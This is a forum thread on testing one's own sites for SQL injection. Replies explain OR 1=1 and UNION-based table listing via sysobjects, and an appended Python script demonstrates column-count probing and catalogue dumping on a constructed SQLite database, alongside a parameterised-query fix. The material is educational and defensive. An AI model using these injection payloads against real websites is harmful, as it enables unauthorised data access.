SQL Injections

Status
Not open for further replies.

ziycon

New Member
I'm looking for a query that will show, say, the tables in the database of a site, just to test my own sites against SQL injection attacks.

If you wouldn't mind PMing me the actual reply, as I know it's not the type of information you should just throw out there!

Thanks in advance.
 

mneylon

Administrator
Staff member
You want a query to show you the tables or you want a query that will show you more?
 

ziycon

New Member
You want a query to show you the tables or you want a query that will show you more?
Well, basically a query that will show if an SQL injection attack will work on my site or not, if you get me!? I need to see what people can see and change.
 

cal

New Member
It depends on the database you are using. I presume that you are using parameters on your URLs? If you are using stored procs this would not be an issue. If you are building SQL strings then it may be.

Injection attacks take the form of appending pieces of SQL which are always true onto your param, i.e. OR 1=1, so your SQL becomes something like select * from mytable where custid=3232 or 1=1, which brings back all customers.

To get a list of tables you would need to try and append a UNION query to the string: select * from mytable where custid=3232 UNION select tablename from sysobjects where xtype = 'U'. Doubt this would work as the columns would not match. Maybe if you could work out the columns that the customer query brought back and aliased the second query's columns to the same names/numbers. It would be messy and unlikely to work.

Also, the user that you run your SQL as should have as few permissions as possible - not the admin!
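The two attacks cal describes (the always-true OR 1=1 and the UNION against the system catalogue), plus the parameterised fix, worked through end to end as an added example. This is not code from the thread; it uses an in-memory SQLite database with a constructed customers/orders schema, and SQLite's sqlite_master catalogue stands in for the SQL Server sysobjects table named in the post. The column-count probe does what the post suggests: it pads the UNION with NULLs until the database stops complaining that the column counts differ. The function names and sample rows are all assumptions made for the example.

```python
import sqlite3

# Constructed sample schema and rows for the demonstration (not from the post).
SCHEMA = """
CREATE TABLE customers (custid INTEGER PRIMARY KEY, name TEXT, email TEXT);
CREATE TABLE orders (orderid INTEGER PRIMARY KEY, custid INTEGER, total REAL);
INSERT INTO customers VALUES (3232, 'Alice', 'alice@example.com');
INSERT INTO customers VALUES (4001, 'Bob', 'bob@example.com');
INSERT INTO customers VALUES (5150, 'Carol', 'carol@example.com');
INSERT INTO orders VALUES (1, 3232, 19.99);
"""


def make_db():
    """Fresh in-memory SQLite database loaded with the constructed schema."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def lookup_vulnerable(conn, custid):
    """Builds the statement by string concatenation, exactly the pattern the
    post warns about: whatever arrives in custid is parsed as SQL."""
    sql = "SELECT custid, name, email FROM customers WHERE custid=" + custid
    return conn.execute(sql).fetchall()


def lookup_parameterised(conn, custid):
    """Same query with a bound parameter. The driver sends the value
    separately from the statement text, so it is never parsed as SQL."""
    sql = "SELECT custid, name, email FROM customers WHERE custid=?"
    return conn.execute(sql, (custid,)).fetchall()


def find_union_column_count(conn, max_cols=8):
    """Work out how many columns the original SELECT returns, as the post
    suggests: keep adding NULL columns to the UNIONed SELECT until the
    database stops rejecting the statement for a column-count mismatch."""
    for n in range(1, max_cols + 1):
        payload = "3232 UNION SELECT " + ", ".join(["NULL"] * n)
        try:
            lookup_vulnerable(conn, payload)
            return n
        except sqlite3.OperationalError:
            # "SELECTs to the left and right of UNION do not have the
            # same number of result columns" -> try one more column.
            continue
    return None


def tables_via_injection(conn):
    """Once the column count is known, put the catalogue's table name in the
    first column and pad the rest with NULL so the UNION is accepted.
    sqlite_master here plays the role of sysobjects in the post."""
    n = find_union_column_count(conn)
    if n is None:
        return []
    cols = ["name"] + ["NULL"] * (n - 1)
    payload = ("3232 UNION SELECT " + ", ".join(cols)
               + " FROM sqlite_master WHERE type='table'")
    rows = lookup_vulnerable(conn, payload)
    # The genuine customer row has an integer in column 0; the injected
    # catalogue rows carry the table name there.
    return sorted(r[0] for r in rows if isinstance(r[0], str))


if __name__ == "__main__":
    db = make_db()
    print("normal:       ", lookup_vulnerable(db, "3232"))
    print("OR 1=1:       ", lookup_vulnerable(db, "3232 OR 1=1"))
    print("column count: ", find_union_column_count(db))
    print("tables:       ", tables_via_injection(db))
    print("parameterised, same payload:", lookup_parameterised(db, "3232 OR 1=1"))
```

Run against the constructed data, the concatenated query returns one row for `3232` and all three customers for `3232 OR 1=1`; the probe settles on three columns, after which the UNION lists `customers` and `orders`. The parameterised version returns the single row for `3232` and nothing at all for the injected string, because the whole string is compared as a value rather than executed. Note that SQLite has no per-user privileges, so the post's last point about running as a low-privilege database user cannot be shown here; on SQL Server or MySQL it is what limits how far a UNION into the catalogue can reach.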
 